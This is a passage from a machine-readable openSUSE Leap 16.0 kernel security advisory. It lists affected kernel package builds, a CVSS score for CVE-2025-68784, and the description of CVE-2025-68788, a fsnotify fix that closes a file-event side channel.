"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68784"
},
{
"cve": "CVE-2025-68788",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68788"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfsnotify: do not generate ACCESS/MODIFY events on child for special files\n\ninotify/fanotify do not allow users with no read access to a file to\nsubscribe to events (e.g. IN_ACCESS/IN_MODIFY), but they do allow the\nsame user to subscribe for watching events on children when the user\nhas access to the parent directory (e.g. /dev).\n\nUsers with no read access to a file but with read access to its parent\ndirectory can still stat the file and see if it was accessed/modified\nvia atime/mtime change.\n\nThe same is not true for special files (e.g. /dev/null). Users will not\ngenerally observe atime/mtime changes when other users read/write to\nspecial files, only when someone sets atime/mtime via utimensat().\n\nAlign fsnotify events with this stat behavior and do not generate\nACCESS/MODIFY events to parent watchers on read/write of special files.\nThe events are still generated to parent watchers on utimensat(). This\ncloses some side-channels that could be possibly used for information\nexfiltration [1].\n\n[1] https://snee.la/pdf/pubs/file-notification-attacks.pdf",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
